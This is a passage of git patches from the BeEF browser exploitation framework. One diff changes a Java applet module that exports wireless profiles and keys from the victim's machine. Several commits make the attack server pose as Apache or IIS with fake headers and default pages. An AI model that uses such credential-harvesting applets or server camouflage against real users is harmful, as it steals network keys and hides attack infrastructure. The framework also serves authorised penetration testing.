zt)dzTSA{VeW(qc{2;8)MYhYC{IX2KeFz{iFJVu@Za|}ROLZBrS`cRj-==n?!xR-k%
z)l20L74GW~ZwsT?McQwTx7y=Y_-RrWvU@+SSMI#W{i>(PEPU)Rvo2S9Sn2e2V<O^E
zq;~m)q?N{vaKSHrX??$6)82k^P=I{ZJ9@JIt|(+_H!x@zyX}Dj%rJlAW4CJ7Z}t-K
zyoDs{EDYYIQCr@W9`=^C>I6)%#e`173a{LGwW4`6DNuc6-3)PkJ=!xg(4BJb(U3v7
z&#3!!tz63$)sv`x;U&mw*2EC!A#Un(XW0NcoW@kAexYkV&mO6{vdXWy9*JD&gf=_x
zjF-N5t*`*(6K)TOxI{oEx-wRa`gCJNE2LxO_8tgXE1rpHIoXnOebXy5Bjd36>BMy>
z)T`u^-qGr|mbv4X!_L(V`$!$9qwzSLtWeXC@3UqIFkcW7M}+d{DglM^S=4AHJ|c2{
zC8jbKp7BL~<W!vH=$^F|6uAs}6xm4iG$x5ocHFq3C+qQZ>19iCM~kwh(LTl@T~%yb
zVznFht8V7VoWm{a=oZnas#7nh{UGZ)`Tb%FhyS#Vz}_|?nXp1Thj^mza=aljBXHWy
zRxUX|^&0WY?J?|X`Zc3lgU27--e{+Ww>MmWU#oYhG`9leJpGWYLTpvFmgl1w=;%H$
z{=02U?xC=4Oxlc3PU8-f0`ef7ub=1GIckV{=bp;T%nA1fchI?n8-l{1oWEn?7)&M|
zy%ED4Cd`H0eaHKfdMaMH&#HiQaZSrgN;ch?I)JeBn1f5b=y^rlbUQ|M{>np2C_i+|
zTKVYOfP&8Mg;jS{S3j?Q{^og+{?TFA9zC^3j9<7X7$DYnKXHH=gv?NAOOb^~Uye)X
z0fF9*4t`ZL^}-MZaqi&C-g=Zp+xZkZm=UV1+tkXCvB<9EEl&@>sjlIcTJ1nC-+MXG
zdyik0n2d*;bA(T_3H#T1YX>8o`_xe<S3$*(H(sFdS_%)XN&6T<eT8{_hqTeTi-xaD
zzNVsZJvgaor#=TbGTQ#>SdqXyGyARU8!B#D8==fm34T!<Sr{BV+PGj7%C64q4SL2E
zzFpp5vg1asTNWt~ObZ1>q{GtI%09;=c}1`a8WC%5g9xr+IqDyFgwCy#tTDk$O?n=@
zW<qmr84zD}3YOwbv~iq*Rf0Bt4lT?@Dve<`)Z&ev$0s4Pn`K?i>l1>QuXf3Qo95#;
zF{D@N0kne8wy6z?uak03X0qsY*5Ug+#t~!<A1%s!t<I202dTw0ts!f}%tWBwUYG#m
zzirR}Zpm*ah)mWive#AabGb=R7gmYPXQS6=o$DiQOqA2rG=6eR0WQEkx)Fw#LR#iF
z&l@-PUP6ZJs$Ol7p&+8v9^IwdhQxPLY+8CN5{!J*Vc*Y2>o3e=NQG)?N#X(bM^$vV
zE~e{!_G>FjSg(oz)>ZH8EecMsNG5$oXz6PYiWFVy-8mmFI9rw`s({-Auih*MQ*Djx
zJLAMs_GkF!ljXk<Z22dd4|pC}hTnY~;O7;KZbfc#DJqkldx4##ZnFFXRPpl-1hiMT
z-69ZON)vlBxKUun4zJ{=WWg#rAKsi0&u~meGgI(H=JqTd9)wm<?tB4yul~xQB%>T|
z>7Lo1|Ln2l{_fpQYjK-R&I0>Qi(lr1y2M{Wf*&4pCMw+0ckJA{EVd^TuoQy&@p%^X
z4e6xQi_ObZF`0j3zo~=RhAymlv7c3I9c<|cwN{>%$vO+~S>REV0b2B~Z?Znm@1Qpu
z>P{*mJ)x{>@c{rk;ofnu;eZMD{*lb=$APi&q8Y3pry8BL$b!zQa)LyeaCoOr(lD`u
zRO=yadVszE8Gl!Z1fiKJ*%EfqgYw(R?{;6d06cYIa<<9bb6(|_CTZJpMX;$Yq^=x`
zIY+bMB-kSOI&sTa3VY}7%h{wm=D^lgj!f=0wYA$O#m_F^539RGEL8ejmR-=GXno=Q
zV0U|nbw^+5?bwiiY5?3@C0e?-S3nO2G(cevY%B3Hl=+F=3!)meqDd+F>Lv;=kh$gC
z*?@$f=Xdh1^ffV_yvi=~1_Ly2s2LWSu}4VtjvdDt*q%4lzPd~0RrB&>j`Fi;eaV59
zQc7D56f1t_PPn1+BJkM6vW6ij&J2=IrQJ%m!%$z)t@DMNw6{ZAm0j%+^>Xhx-&WAf
zPEsSeHOZ+DGK-Lr);-1sjo{($NLO(hTa709O3ax@0o(5DOenJy`ASLWWR;bxo3_G=
z=sNC%xDB9PSC^y+unl-Q>IPtG09F6)b?g|xxp{*@vMa#(L$U^EGZgEi7C*({vHr}L
z>t*>ESh$kIvc*91)8+E~s;m7zG0M*0_Z8c?ryJ-q-UR{)7Iz*6Q;SpVkcq_6FOQ3#
zN=Z5z|2S~oQH8FJ`=%#r|NV4iS<*Lo(H56;&gRW<e_m53TfiM2pfMt3x#+&eh-ZLy
zAK6@YvD61#Lm@bN!q254dd;@OXoo4I;zB<#8m5FgrIRvMp$9<LS#(%k%SeCZ+G}_5
zn8!i)nQNLF-<nBwZga&2BX6RUWBi4qH3t`SZt?X8<QYpT`qglHq>w%_>S>O8s1LU=
zHSVNddA#S6SUugO$y@raKa4jgx~al*a|((V^bWp0q%C*}rbFgPbhh*V`+x@36XhG>
z_r@!cZMsqljjM;&C3#bPxcRM~^e2;jZ|=Oi7~hy05dp3p@eFVGM)E`@%|f=XRQNfB
zIJsEDT|1QqJdPBb_-f7uCoIrVwun6vGHsGJrPE5`?-3KPM%Nx`cMb2&v2={|IL7uu
zXg?V>B`z0$=_O5LZ5}!#*Weopzf#hz@XP-Mu}UChzaa!hzDX2RtQ(1Rs3vKYHwcWn
zi+MK`Q$_H~iAvhY>U_5oGX(a`&)a0$U$F1%S|diwo>vRpkF<y^s@<l+dC;$b4z%H}
z@JPd?>d==S<}eWfBB}o)P?yJG8~8y9dv=^@gpg4`ASH|&lYOf181zdZ{c;Zb;#Q%N
zcnC@nCeV;`CObF;G+KHb=+dMGvQdjPC&VVahl@B87<-Uz<tz5`3iKxi<1hq=SEe2?
z6*3KVI+sm(vBudw9_^psGSeT2lSo`T!`0P%ttjz0Q)12kjB*XGJ_jR)*F?X~RvNoT
z6|fC(ZRjNFB$@xb>3(-v|2H-s`e#d<v(nL(1AhB2Jp&)zADB1zL(kYeP6*p6-W&Xe
zOzb2lgzNX_zt)Wv0;n+l_G~ENFZv>^4?tM#)VU4*eYfBr1pS>%WAOk57QfRs>FE9g
Dw3X#R

delta 2947
zcmZ9O2T&8*5{4-O0|e>Pt`uofL<sd#G?YX^nuI3OkrKfW#0!EzD4``lzyJy;y^AP<
z2_Qv!FcfJD3P`A;Kq%5g@WnfCeD}WH**Uvs=FHihIcL7VO>|tC)9MN{fS&<KcX^Os
zI;SF<A2O_;h9*}S87V$2oVEH|V8p`49-OY;`VNvqzL##@=JINWI@JSs&s@67dRaN%
znjgGe4O3yun~ZdcxqskEz-1l-hP83&-li(|wOJJ3KMD-il*;h94HQdseC^Qt_LYHS
zK%(|&Zx#6@azEd+u;$j6=BD{YjZz|<_+d__pjBjM9N8Xeb>#$56+i{0FfcG=(Bt2Y
zPN|^5YLs_f%$-6@BkQG2GA?HA7pt3IPGm`jhkde;oyi-e@l?GVA)VSdRSk#1)v<Fb
z+@U%hq$<{BRf3~!TcNr|3#rOiUmLqF7Oruc=0#X|V7&Xaqy|fZQi60F*<$-+zHP+#
z9BG*r?H?$>e2T^sD@R1$>vCO6SZYch{E5D3U4Q>d&k5oH;A3?Htc11@x%~mrB91=Y
z5k--*8k6TZfm&y)?n|z*Ih}c8WlB7=h{HRl(1H8HCxf;*6t=H-r}|3pXs`Gx->*?6
z9I$JX^f5UZ|8G<Xee<_*(=&6Zjlnq+3j#Y62wi()e(dJ9@8KYYJXl|l1f|d;B`JM4
z?PC-n#Wok8ZGz2gj}k3R3^d>ywTqQ4OMxi8jLJ?*PfF^(*wZ)?C0G-mE>KY#m|7Uc
zC@vawmLpf?p07)=OJt~+8HQQ%jJE_6ue;z9=Kw{?#QZ8y*+j|YoMwhv8e>ur8}2*W
zTUKyUaJfA5toE{?z=EJm){Uj*_Ju|^vf6x_RvO>3hB{b9Q(av}O<n6nGSlsp^oH2!
zgOu&`&fN6O=*C(>p{2)WDJdX)tevvEUgL53eu98=&hov~$cx9H{kKGHTTq1)l+6$i
zv7iC|#up1-OBx|GimYfyB(df~*YyYJt;!Mk){W1N4nZ`Jl~r0B%hA{%4(ZtY>dvy~
zOTP7Cc&qo3zL$Q$R(eIK?E`+P3t+FTsWCydYn785*`Wh80^WN`V_<)8=IP?oTgW|c
zS#KCCtbXA&=+1-H&20PQy2p7-XWs3sQJ0EO!83LDvW1-St_Nj{-*KtknuSy73lXb6
z>j;<Tzixz-UHU}KV_)05?mq{uBW@x&DSw9FrK<YPT+G~_%9bYDl}_Io&eNEDPo8iK
zBG)|A*-bX^!|7Ti4Z*93)hZs<8$U$cmo)<Yrbz`y&YwVXE!c-gKc@vcWntp6vM?^U
zFPgqiI%H3woXWH<iJRed>YDxN)-Om$`@_v~I6jNn<;^AM(Pi}-0?%DnsVa1Xap2HA
zrK*psN)Iz6ZrwDIvE99Mwr&BwPASu!_k4q^T6d^icL{iz=##li6&4SoMdYJbVe>^L
zF%(*4{$td=-6j^%F8p~{)Qs5}iR@z=(;Fs;XM@4*$*akswLRe<C*_<cVT7!V$SNlK
z_dEdv*jGs=GBGgd1OEAjB|(0KCjcF0LHha`poqR6!Vl#>)|s5nHj@>U#oS=&jA7(8
z<W-iOi^p*zqajfcw??j93$RM|HE-`pV<>bpHN==1o9Jt0(0EtVcW|>i=<Y_h`0S?Z
zzLK3~a3^cg*7Nac+i|+Pj;{uwfBxWzf;K!YV9Dj+hQ2bqflGeMuJhcyCzwU|t-NPB
zdX{#7SjLl-tPl3!-Bmc-<IQsT+%=7v_oS(I$*js97BB50h>=qo(jCJwB2{b;%bySd
zr($;=g5cFh9XT>%x7gSMwOxQGY9#Vvq%AIAmapIu^HY%^7f5tP!g}h!d2lN{Ax7^!
zm4yYjS%iVJ=NL<yKlf^up7)}DsmGx0rJLVy-)_iN*JpitR1s+yp#IkrQtfCE=m{yV
zgu+SLumdl=9}89mIIbZFtwxXz;eIcE0z-noTr!)x+%n}?7v>*dsqvB^%nsBAv9GLY
zRwH#6!Tdt&`+2K0ue1lf1Ib3EqZT@Wtux$9iq`R+=Ic%O8a+uL?C`@MB_5$G9FlAm
zvOMFkI};F+KZyzmaq1*WH<!)*)oeh_6+LBo7v6ncdp`eEr9*;U{EO7VL@G?_Bd(#(
zxFc9^X21#&IJAZ<`OL^e8nS@$rcN8VTV<#P8HYoh$m~*CGeh<&{A;%x2|>mEL(mbm
z{+{vFVlJX+jU4rs0BzP;08OJt#3Nd<?pie_yWda=A+*^rtq`G(YX-TQm%}nlYxeMc
z(%}VjMvnw&KQE^RDO`X(!CC@@J3>wOBS|$mj0(!La2>IdI_wZCJsN5oo_a;0^|i3T
zgIWdAGSql2Qeu!#OvbAFLBkoUqJXPsEY{sAb0Y;C09{fLQ`*cym$+NIDYSNK7}Tg$
zT+8*;cvPzk?<Cu;m-;U|VAv6x4JcbnMorMS+&TGAPxcKmUYywrvtY#xru?z#I6WHF
zg@JZNRj_92c)e9b&YdbebO-Q^k_zQ`W%oqv4>^nwgQKj@ctW?K;hJWz1*%u{#>4B|
zDzD|b!&hSUzQ{$Q^(u2QxGg8C)0a}M#T<=Km^BVfr`PKl=^3dH>=%X`qP-@H+V>go
zYW;`#v!8_n-xyK=mcp_|wV!(aY^)}S<t7?7xm;7LgqS70I4n|a`0kXwFztb|x}g7R
z+9I&rHe^M*_ZDT86ZgY%D5dqKWr&Wv>l8NVq87H3uS{$i{luK$J}J!=(ba@8L+*q{
z9KS_)0-M<2{beR_QUI9wAWUl@$!)6sXrB|W+vEf9wV;$y0``fZHW^$!n-kN`{B`6a
z^Ma1s0i|m)+n^ipN6IF-+y`%j-JqPqmLI31vJp05-Qu#Hwys4&_E%nRu>xUOch2p$
z{vv2ZA=-HR5!an>KPWqz{Y3%391$qQcU-OcEABM}mM<d5qRzLpGH&(<&-2{Yxtm4o
zTZvf`QPxcjtWSk^gj>Pf4ROt)^B*Mhufy)FHBgyv7)(^O#r}}A@r%|465k^V)l0Um
zzN%+y8l7#3jrm9xjjxukpW!NC=N)DTJDW&pn4y<@t<2Y#sewwb&Dd``YgROu0<9mq
z$-V3t$oWtsaH}ui<dRkb?CKw)1|~L5u_Ffvv!pl0Z#|07;^O)a$9OXEZjSX)&`gwp
zh(K+{ZNZks_U*G=iU=F!0#^~LB!+3Aeamfjq~+opqi973VY~X?`V~a~Td_UCCd==(
zf>+Vz_p=ekOgM2XAf^;0k#g;oWx~WpOI^qGsym?gwu5PL&Zz^re)n&Z2Uk~@z$L2Z
zO&jG;Lpk*eiOMMlrFEkfd|JK12qkVyYuHtBiZ6mw`kO{Q>`aMjOx$n>%3TB(|5gLr
zU5lauvy8{Ds&{vM0cOE)J#g!czDt1(6KG3VpR<h@2woevcwe=+$Yt*sBv?AE7amaj
z6C}<VYE$*KAzIG&_?{B<tAqTI`^n)+vYbUC)&T;wS#h;tySdWC6yv6!GaOa^JZ+;+
z=$1o_{x=#zJP(uV^;rhU#hYl!6E(z#IS(IxX1)20uzSwG>)D<85dRKWU!T$EacJAZ
z*l`b0zm8y{*kga)U@)Kas`jo5*FE_cLZZ@NS?120u|75DZ+VR>-Ib<hu(yS_5|vWQ
zl_BgPsWkLj^q{seiOWcqcCFdoOGm22JfC5qcE&1+IGmGU{_}4Py-&Mb4rgUxVB+|N
zAx0*ChTj4gq6%Q5f(U4k4v;Q)A-_Zyp&g`g@>lUcdJzDeDvoq)L4N5jI?w(#HU>J?
pe%ljz@n0bZJAeG<-xtwI2l;0cLcfpwN<I@(ITcx>>CG`P{0F5PU2OmW

diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java
index e0c349785..8349d64a2 100644
--- a/modules/host/get_wireless_keys/wirelessZeroConfig.java
+++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java
@@ -68,12 +68,16 @@ public class wirelessZeroConfig extends Applet{
 	    	} catch (IOException e) { }
 		
 		try{	
+    			String tmpDir = System.getProperty("java.io.tmpdir");
+			if ( !(tmpDir.endsWith("/") || tmpDir.endsWith("\\")) )
+   				tmpDir = tmpDir + System.getProperty("file.separator");
+
 			//Export WLAN Profile to XML file
 			for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
 				String profileName = iterator.next().toString();
 				Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');  
 				//Check if exported xml exists
-				File f = new File("Wireless Network Connection-"+profileName+".xml");
+				File f = new File(tmpDir+"Wireless Network Connection-"+profileName+".xml");
 				if(f.exists()){	
 					//Read contents of XML file into results variable
 					FileInputStream fstream = new FileInputStream(f);

From 6bebb80f61bf8add9b21f12548e4f8488b68c096 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 15:47:21 +0100
Subject: [PATCH 12/31] Added default 404 HTTP response bodies for Apache 2.2.3
 and IIS 6

---
 core/main/router/router.rb | 78 ++++++++++++++++++++++++++++++--------
 1 file changed, 63 insertions(+), 15 deletions(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index c21c089f5..439709210 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -24,7 +24,62 @@ module BeEF
 
         config = BeEF::Core::Configuration.instance
         configure do set :show_exceptions, false end
-        not_found do 'Not Found' end
+
+        # @note Override default 404 HTTP response
+        not_found do
+          if config.get("beef.http.web_server_imitation.enable")
+            type = config.get("beef.http.web_server_imitation.type")
+            case type
+              when "apache"
+                #response body
+                "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" +
+                    "<html><head>" +
+                    "<title>404 Not Found</title>" +
+                    "</head><body>" +
+                    "<h1>Not Found</h1>" +
+                    "<p>The requested URL was not found on this server.</p>" +
+                    "<hr>" +
+                    "<address>Apache/2.2.3 (CentOS)</address>" +
+                    "</body></html>"
+              when "iis"
+                #response body
+                "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">" +
+                    "<HTML><HEAD><TITLE>The page cannot be found</TITLE>" +
+                    "<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
+                    "<STYLE type=\"text/css\">" +
+                    "  BODY { font: 8pt/12pt verdana } " +
+                    "  H1 { font: 13pt/15pt verdana }" +
+                    "  H2 { font: 8pt/12pt verdana }" +
+                    "  A:link { color: red }" +
+                    "  A:visited { color: maroon }" +
+                    "</STYLE>" +
+                    "</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>" +
+                    "<h1>The page cannot be found</h1>" +
+                    "The page you are looking for might have been removed, had its name changed, or is temporarily unavailable." +
+                    "<hr>" +
+                    "<p>Please try the following:</p>" +
+                    "<ul>" +
+                    "<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>" +
+                    "<li>If you reached this page by clicking a link, contact" +
+                    " the Web site administrator to alert them that the link is incorrectly formatted." +
+                    "</li>" +
+                    "<li>Click the <a href=\"javascript:history.back(1)\">Back</a> button to try another link.</li>" +
+                    "</ul>" +
+                    "<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>" +
+                    "<hr>" +
+                    "<p>Technical Information (for support personnel)</p>" +
+                    "<ul>" +
+                    "<li>Go to <a href=\"http://go.microsoft.com/fwlink/?linkid=8180\">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>" +
+                    "<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr)," +
+                    "and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
+                    "</ul>" +
+                    "</TD></TR></TABLE></BODY></HTML>"
+
+            end
+          else
+            "Not Found."
+          end
+        end
 
         before do
           # @note Override Server HTTP response header
@@ -32,23 +87,16 @@ module BeEF
              type = config.get("beef.http.web_server_imitation.type")
              case type
                when "apache"
-                headers "Server" => "Apache/2.2.3 (CentOS)"
-
-                #todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
-                #todo the 404 response will be something like the following:
-                #<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
-                #<html><head>
-                #<title>404 Not Found</title>
-                #</head><body>
-                #<h1>Not Found</h1>
-                #<p>The requested URL /aaaa was not found on this server.</p>
-                # <hr>
-                # <address>Apache/2.2.3 (CentOS)</address>
-                # </body></html>
+                headers "Server" => "Apache/2.2.3 (CentOS)",
+                        "Content-Type" => "text/html"
 
                when "iis"
-                headers "Server" => "Microsoft-IIS/7.0"
+                headers "Server" => "Microsoft-IIS/7.0",
+                        "X-Powered-By" => "ASP.NET",
+                        "Content-Type" => "text/html"
              end
+          else
+            print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
           end
         end
       end

From 454280f7de5e33ed7c53ca2da337255cf1ce7403 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:05:52 +0100
Subject: [PATCH 13/31] Adjusted errors and default returns for the web server
 imitation.

---
 core/main/router/router.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 439709210..e38a36b9a 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -74,7 +74,8 @@ module BeEF
                     "and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
                     "</ul>" +
                     "</TD></TR></TABLE></BODY></HTML>"
-
+              else
+                "Not Found."
             end
           else
             "Not Found."
@@ -94,9 +95,9 @@ module BeEF
                 headers "Server" => "Microsoft-IIS/7.0",
                         "X-Powered-By" => "ASP.NET",
                         "Content-Type" => "text/html"
+               else
+                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
              end
-          else
-            print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
           end
         end
       end

From f5a77a63eb243fd97d026d2c375b93fd549a2b1f Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:06:19 +0100
Subject: [PATCH 14/31] Prevent to mount the favicon.ico if we're imitating a
 web server.

---
 extensions/admin_ui/api/handler.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index e2ab272e8..1f7973e73 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -44,8 +44,10 @@ module API
       beef_server.mount('/ui/media', Rack::File.new(media_dir))
 
       
-      # mount the favicon file
-       beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
+      # mount the favicon file, if we're not imitating a web server.
+      if !configuration.get("beef.http.web_server_imitation.enable")
+        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
+      end
     end
     
   end

From 870a182411ab395840aac630229000b8bebadafb Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:33:32 +0100
Subject: [PATCH 15/31] Added HTTP response with default Apache centos root
 page (web server imitation).

---
 core/main/router/router.rb | 140 ++++++++++++++++++++++++++++++++++---
 1 file changed, 132 insertions(+), 8 deletions(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index e38a36b9a..88df9842f 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -23,7 +23,9 @@ module BeEF
       class Router < Sinatra::Base
 
         config = BeEF::Core::Configuration.instance
-        configure do set :show_exceptions, false end
+        configure do
+          set :show_exceptions, false
+        end
 
         # @note Override default 404 HTTP response
         not_found do
@@ -85,21 +87,143 @@ module BeEF
         before do
           # @note Override Server HTTP response header
           if config.get("beef.http.web_server_imitation.enable")
-             type = config.get("beef.http.web_server_imitation.type")
-             case type
-               when "apache"
+            type = config.get("beef.http.web_server_imitation.type")
+            case type
+              when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
                         "Content-Type" => "text/html"
 
-               when "iis"
+              when "iis"
                 headers "Server" => "Microsoft-IIS/7.0",
                         "X-Powered-By" => "ASP.NET",
                         "Content-Type" => "text/html"
-               else
-                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
-             end
+              else
+                print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
+            end
           end
         end
+
+        # @note Default root page
+        get "/" do
+          if config.get("beef.http.web_server_imitation.enable")
+            type = config.get("beef.http.web_server_imitation.type")
+            case type
+              when "apache"
+                "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\">" +
+                    "<head>" +
+                    "<title>Apache HTTP Server Test Page powered by CentOS</title>" +
+                    "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />" +
+                    "<style type=\"text/css\">" +
+                    "body {" +
+                    "background-color: #fff; " +
+                    "color: #000;" +
+                    "font-size: 0.9em;" +
+                    "font-family: sans-serif,helvetica;" +
+                    "margin: 0;" +
+                    "padding: 0; " +
+                    "}          " +
+                    ":link {        " +
+                    "color: #0000FF;    " +
+                    "}                     " +
+                    ":visited {               " +
+                    "color: #0000FF;             " +
+                    "}                              " +
+                    "a:hover {                         " +
+                    "color: #3399FF;                      " +
+                    "}                                       " +
+                    "h1 {                                       " +
+                    "	text-align: center;                          " +
+                    "	margin: 0;                                      " +
+                    "	padding: 0.6em 2em 0.4em;                          " +
+                    "	background-color: #3399FF;" +
+                    "	color: #ffffff;       " +
+                    "	font-weight: normal; " +
+                    "	font-size: 1.75em; " +
+                    "	border-bottom: 2px solid #000; " +
+                    "}        " +
+                    "h1 strong {" +
+                    "font-weight: bold;  " +
+                    "}          " +
+                    "h2 {          " +
+                    "	font-size: 1.1em;" +
+                    "font-weight: bold;    " +
+                    "}                                      " +
+                    ".content {                       " +
+                    "	padding: 1em 5em;                             " +
+                    "}                                        " +
+                    ".content-columns {                                     " +
+                    "	/* Setting relative positioning allows for    " +
+                    "	absolute positioning for sub-classes */                       " +
+                    "	position: relative;                                               " +
+                    "	padding-top: 1em;                                                     " +
+                    "}                         " +
+                    ".content-column-left { " +
+                    "	/* Value for IE/Win; will be overwritten for other browsers */" +
+                    "	width: 47%; " +
+                    "	padding-right: 3%; " +
+                    "	float: left;          " +
+                    "	padding-bottom: 2em;     " +
+                    "}                            " +
+                    ".content-column-right {         " +
+                    "	/* Values for IE/Win; will be overwritten for other browsers */" +
+                    "	width: 47%;     " +
+                    "	padding-left: 3%;  " +
+                    "	float: left;        " +
+                    "	padding-bottom: 2em;   " +
+                    "}                           " +
+                    ".content-columns>.content-column-left, .content-columns>.content-column-right {" +
+                    "	/* Non-IE/Win */" +
+                    "}                  " +
+                    "img {                 " +
+                    "	border: 2px solid #fff; " +
+                    "	padding: 2px;              " +
+                    "	margin: 2px;               " +
+                    "}                           " +
+                    "a:hover img {               " +
+                    "	border: 2px solid #3399FF;    " +
+                    "}                                 " +
+                    "</style>                             " +
+                    "</head>                                 " +
+                    "<body>                                     " +
+                    "<h1>Apache 2 Test Page<br><font size=\"-1\"><strong>powered by</font> CentOS</strong></h1>" +
+                    "<div class=\"content\">" +"<div class=\"content-middle\">" +
+                    "<p>This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page it means that the Apache HTTP server installed at this site is working properly.</p>" +
+                    "</div>" +
+                    "<hr />" +
+                    "<div class=\"content-columns\">" +
+                    "<div class=\"content-column-left\"> " +
+                    "<h2>If you are a member of the general public:</h2>" +
+                    "<p>The fact that you are seeing this page indicates that the website you just visited is either experiencing problems or is undergoing routine maintenance.</p>" +
+                    "<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name \"webmaster\" and directed to the website's domain should reach the appropriate person.</p> " +
+                    "<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to \"webmaster@example.com\".</p>" +
+                    "</div>" +
+                    "<div class=\"content-column-right\">" +
+                    "<h2>If you are the website administrator:</h2>" +
+                    "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
+                    "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "</div>" +
+                    "</div>" +
+                    "</div>" +
+                    " <div class=\"content\">" +
+                    "<div class=\"content-middle\"><h2>About CentOS:</h2><b>The Community ENTerprise Operating System</b> (CentOS) is an Enterprise-class Linux Distribution derived from sources freely provided to the public by a prominent North American Enterprise Linux vendor.  CentOS conforms fully with the upstream vendors redistribution policy and aims to be 100% binary compatible. (CentOS mainly changes packages to remove upstream vendor branding and artwork.)  The CentOS Project is the organization that builds CentOS.</p>" +
+                    "<p>For information on CentOS please visit the <a href=\"http://www.centos.org/\">CentOS website</a>.</p>" +
+                    "<p><h2>Note:</h2><p>CentOS is an Operating System and it is used to power this website; however, the webserver is owned by the domain owner and not the CentOS Project.  <b>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project.</b>" +
+                    "<p>Unless this server is on the CentOS.org domain, the CentOS Project doesn't have anything to do with the content on this webserver or any e-mails that directed you to this site.</p> " +
+                    "<p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>" +
+                    "<p><a href=\"http://www.internic.net/whois.html\">http://www.internic.net/whois.html</a></p>" +
+                    "</div>" +
+                    "</div>" +
+                    "</body>" +
+                    "</html>"
+              when "iis"
+
+              else
+                ""
+            end
+          end
+        end
+
       end
     end
   end

From 0067e2070270adbfba0660fe56c593ededb2023a Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:41:15 +0100
Subject: [PATCH 16/31] Changed HTTP response 'server' header to IIS/6  when
 iis is specified.

---
 core/main/router/router.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 88df9842f..f21401d30 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -94,7 +94,7 @@ module BeEF
                         "Content-Type" => "text/html"
 
               when "iis"
-                headers "Server" => "Microsoft-IIS/7.0",
+                headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
                         "Content-Type" => "text/html"
               else

From 616b969f96094f46cb2343b51f9dfb5b2f54e413 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 4 Apr 2012 16:42:42 +0100
Subject: [PATCH 17/31] added todo for IIS 6 default root page (web server
 imitation)

---
 core/main/router/router.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

